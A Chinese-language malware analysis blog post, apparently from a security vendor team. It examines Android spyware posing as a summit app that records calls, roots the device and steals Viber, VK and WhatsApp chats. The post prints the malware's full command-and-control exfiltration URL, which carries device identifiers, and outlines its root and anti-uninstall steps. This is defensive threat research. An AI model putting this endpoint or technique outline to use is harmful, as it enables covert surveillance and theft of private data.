窃私病毒染指社交软件,安天移动安全与猎豹联合披露

微信头图1-02.jpg

随着移动互联网的发展和智能手机的普及,社交网络焕发出新的活力,移动社交受到人们的欢迎,移动社交APP也成为最流行的手机应用程序之一。与此同时,社交软件作为个人隐私信息的重要载体,也被恶意攻击者所觊觎。

近期,安天移动安全与猎豹移动就联合捕获到一例窃取社交软件信息等个人隐私的恶意样本,通详细的深入分析后发现,该恶意样本通过伪装成正常应用潜入用户手机,一旦运行就会接受远程控制命令展开一系列的恶意行为:监听用户通话、拦截并窃取用户短信、联系人、历史通话记录、浏览器历史记录、地理位置等隐私信息,并通过短信和http等方式回传隐私信息。此外,该病毒会通过私自拍照、录音录像、拨打电话、发送短信等方式对用户设备实施窃听。除了这些典型的窃私行为,该病毒还会通过私自提权进一步窃取用户社交软件上的信息,造成用户个人隐私的彻底泄露,具有较强的危害性。以下是对其基本情况和恶意行为的介绍分析。

 一、简要分析

该病毒伪装为某国际合作高峰论坛名称的应用程序,具有一定的迷惑性,与此同时包含远程控制模块、提权模块以及社交软件隐私信息窃取三部分恶意模块,窃取隐私信息的目的性较为明确,恶意程度较为严重。以下为其基本情况:

001.png

该病毒的恶意模块如下图所示,其中mm模块为主要远程控制模块,包含解析指令、C&C地址、指令响应函数等。

02.png

二、恶意行为分析

1.   远程控制行为

03.png

(远控流程图)

该病毒通过运行MyService这个服务,会打开一个线程,该线程用于解析远控命令和参数:

 04.png

05.png

06.png

该病毒设计了完善的窃听功能,以对用户设备中短信、联系人、环境录音、通话、照片相关功能和信息进行全盘控制和窃取。值得一提的是,该指令集中还包含对通话记录号码和已发送短信等新建信息的删除功能,足以看出该病毒自我隐蔽的意图。下述是该软件指令集:

07.png

2.恶意提权行为

此外,该病毒件存在提权行为,自带提权模块,如下图所示:

 08.png

此模块明显是利用了开源工具(https://github.com/Ste***son/Ro****ols)进行提权。目的是为了使此恶意软件能够执行获取root权限,进行一系列的恶意行为:防卸载以及窃取社交软件的隐私信息。

09.png

通过上图的UpdateBroadcastReceiver广播激活恶意操作:

10.png

并使用busybox mv这个命令将该软件移动到系统目录下,进而实现防卸载以及开始执行权限修改进而读取社交软件隐私信息。

3.社交软件信息窃取行为

该病毒主要对下述三款社交软件实施社交信息的窃取:

11.png

代码中包含了对上述三款社交软件信息窃取的恶意模块:

12.png

并通过开启AppService服务来获取这些社交软件的隐私信息:

 13.png

14.png

窃取Viber的用户聊天记录和通话记录:

15.png

窃取Vk软件好友信息和聊天记录,并且会适配Vk是为V3版本还是为老版本,而后窃取用户的聊天记录、用户信息和好友信息:

16.png

17.png

获取V3版本的聊天记录和用户信息:

18.png

获取老版本的聊天记录和好友信息、用户信息:

19.png

窃取WhatsApp的聊天记录和聊天信息:

20.png

最终该恶意软件会通过上述的命令解析模块将这些数据上传至远程服务器,以完成对用户高度敏感的社交隐私信息的窃取。

4.网络行为分析

通过网络抓包和代码分析,发现该病毒的C&C控制服务器:

21.png

22.png

https://anteet.applinzi.com/get.php?UID=******&Provider=country:cn%0D%0A&Phone_Number=IMEI:******%0D%0AIMSI:******%0D%0AISDN:&Coordinates=null,null&Device=Nexus4&Sdk=17&Version=1&Random=480&Password=password

三、总结

随着用户对移动应用使用场景的不断丰富,移动金融、购物、社交等成为人们生活中不可或缺的一部分,而丰富的“移动生活”所产生的大量用户隐私信息也被越来越多恶意攻击者觊觎:地下黑产信息交易活动愈演愈烈,用户信息被窃事件不绝于耳,用户隐私信息安全伴随移动化浪潮遭遇到前所未有的风险。

与此同时,窃私病毒的信息窃取范围也在不断扩大,恶意程度持续加深,不再仅限于窃取用户通话记录、短信、地理位置等典型的隐私信息,社交软件等含有高敏感度和私密性的个人信息载体成为恶意攻击者的新目标,为用户带来巨大的隐私泄露风险。

针对这种趋势,手机用户应该提高警惕,避免从不知名网站、论坛、应用市场等非正规渠道下载应用;当手机中莫名出现新安装应用等异常情况时,请及时使用安全产品扫描手机并对异常软件进行卸载处理;此外,应培养良好的安全意识,使用猎豹安全大师等集成了安天AVL引擎的安全产品定期进行病毒检测,以更好识别、抵御窃私病毒。

*本文作者:AVLTeam,来源AVLTeam,转载请注明FreeBuf.COM